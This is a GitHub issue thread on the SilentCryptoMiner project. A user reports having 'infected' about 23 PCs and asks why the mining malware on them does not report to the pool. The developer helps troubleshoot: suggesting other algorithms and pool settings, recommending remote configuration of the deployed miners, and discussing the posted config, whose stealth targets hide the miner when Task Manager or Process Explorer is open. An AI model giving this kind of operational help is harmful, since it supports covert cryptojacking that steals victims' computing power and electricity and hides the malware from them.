### ISSUE TITLE
working fine on my pc but not on others

### ISSUE THREAD

**Issue by R3dacted00** [UnamSanctam/SilentCryptoMiner#1372]
it's working fine on my pc but not on others, I should have infected potentially about 23 pcs assuming all of them meet the requirements (and I'm not using the web panel, sorry, I know we can't have much information about it)

On 2miners I see my pc when it mines but the others are not appearing. I tried manually infecting a test laptop which meets the requirements only for XMR mining but that wont show either even though it's mining (I've run the checker there too and even though the gpu is not compatible the cpu miner seems to be running), any Idea what the problem could be? (just by intuition, I know the lack of the web panel can't make you help me much but I want to know what to try to solve this)
![Capture](https://user-images.githubusercontent.com/122580694/212214248-a2544ebf-b46e-4f36-ba54-5090ebf432c2.PNG)

**Comment by R3dacted00** [comment]
These are my settings by the way if they could help

### `{
    "algo": "rx/0",
    "pool": "xmr.2miners.com",
    "port": 12222,
    "wallet": "46Z6Ut7LeaEWQGqRKveqL93CY6gij9VqTH4NBmFRhSpRjPPbAox5Rz1aDDPsdBcZKsPvrRB2supWLA8N4Nayj5uHDa67PwH.{COMPUTERNAME}",
    "password": "",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 50,
    "idle-wait": 3,
    "idle-cpu": 50,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}`

**Comment by UnamSanctam** [comment]
Hmm, that should work fine. On the test laptop it should show up in the pool as long as no "Stealth Targets" are open and as long as you find and submit a share to the pool. But for the other computer are you sure that no antivirus has removed them or anything?

**Comment by UnamSanctam** [comment]
Alright, you could also try mining some coin that uses a CryptoNight algorithm or the GhostRider algorithm since they require a lot less resources (RAM, CPU cache and such) and see if they appear then. In case those computers have very bad specifications.

**Comment by R3dacted00** [comment]
I'm changing it now, which cn should I put? and do you also recommend changing anything else? 
![image](https://user-images.githubusercontent.com/122580694/212337652-f6442163-8afc-4f2e-bb35-2da402d2fc31.png)

**Comment by UnamSanctam** [comment]
Depends on what you want to mine, you could try Zergpool coin switching (with automatic coin exchanging) for GhostRider. I haven't tested it much though.
The settings would be:
Algorithm: `GhostRider (gr)`
Pool: `ghostrider.mine.zergpool.com:15354`
Wallet: `BTC_WALLET`
Password: `c=BTC`
SSL/TLS: `On`

You could also choose something other than BTC to get payouts in by changing the chosen coin in the password, https://zergpool.com/site/payouts.

**Comment by UnamSanctam** [comment]
I would also recommend adding a "Remote Configuration" so that you can at least change the settings of the current miners.

**Comment by R3dacted00** [comment]
I'd prefere monero, btw I got my hands on another average laptop, will try that too

**Comment by UnamSanctam** [comment]
Alright good, though you can just easily exchange anything you get to Monero so it doesn't really matter what you choose as the payment coin. I just set it to BTC since it's guaranteed payout, though I think LTC has lower transaction fees.

**Comment by R3dacted00** [comment]
I'm setting the remote config now so it'll save time, after I update the settings remotely how much time will it take for the miner to "refresh the settings"?

**Comment by UnamSanctam** [comment]
The miner checks the "Remote Configuration" every 100 minutes to not stress the webhost.

**Comment by R3dacted00** [comment]
thanks, and should I put the username on zergpool or it's not required?

**Comment by UnamSanctam** [comment]
You mean a worker name? Then no it's not required, just like the majority of pools. Though if you want one then you can add one.

**Comment by R3dacted00** [comment]
ok, done, I'm injecting it now (zergpool) on my PC and checking if it works, I should look up the btc address on zergpool to see if it's getting any hashes, right?

**Comment by R3dacted00** [comment]
from the sound of my ryzen seems to be functioning, will wait for a share to appear and in the peantime I'll test the laptop too, I'm assuming I'll see them under the same worker on zergpool, or no worker at all since I didnt name it, so it may be better to test them one at at time, right? (forgive me for all these questions)

**Comment by UnamSanctam** [comment]
Yes they should show up under the same default "worker" I believe so you'd have to test the one at a time. Zergpool can also take some time to show the share like most other pools. Though should only take a minute or two on zergpool.

**Comment by R3dacted00** [comment]
ok, it took a lot but it spiked on my pc mining

![image](https://user-images.githubusercontent.com/122580694/212361934-fa5c8f98-ff7a-4593-8134-fc57ca3d227f.png)

I uninstalled it and now I'm testing if it works with the test laptop too. Like yesterday, the checker is telling me the cpu miner is working, but I will wait again hoping for a share to appear

![WhatsApp Image 2023-01-13 at 16 46 03](https://user-images.githubusercontent.com/122580694/212363916-0777ec9d-b677-4dc7-a786-ea1d3e077bc7.jpeg)

**Comment by R3dacted00** [comment]
I waited a while to confirm it but... it's 0 again on the test pc, I've run the checker to be sure it was present at least and it was, but for some reasons it won't show hashrates on other PCs beside mine.

![image](https://user-images.githubusercontent.com/122580694/212375327-8420e192-ceb2-401a-a90e-8b635a90d487.png)

I'll keep troubleshooting it by using this version with the remote config to infect other pcs and tweaking the configs remotely until I find what the problem was. I ask you to keep this issue still open for a day or two so I'll post updates and close it when I find a solution, thanks for your patience Unam

**Comment by R3dacted00** [comment]
ok, didn't think it would have been this fast but it appears to have resurrected from the dead by itself, so everything is working again even on the test laptop.

![image](https://user-images.githubusercontent.com/122580694/212380392-78280cf8-6bf2-46b0-9111-c717725eda7a.png)

one last question and I'll close the issue, the hashrate is not constant at all: could be zergpool but it appears and disappears for minutes even though the laptop has a decent processor, an i5 of some sort but I don't remember the specific model, it still looks strange to me that it can't mine on RandomX, any advice on how to optimize this to get more hashes?

**Comment by UnamSanctam** [comment]
The hashrate will only be shown on the pool when it finds a share, and pools calculate the hashrate by the amount of shares found over a certain interval. How often a share is found depends on the hashrate and the pools share difficulty.

I also have to FAQ entries about it here:
https://github.com/UnamSanctam/SilentCryptoMiner/wiki#why-is-the-hashrate-shown-on-the-pool-different-from-what-i-expect-or-from-what-is-shown-in-the-web-panel
https://github.com/UnamSanctam/SilentCryptoMiner/wiki#why-is-my-miner-not-showing-up-on-the-pool-even-though-its-mining

**Comment by R3dacted00** [comment]
Perfect, thank you for your work, I really appreciated it
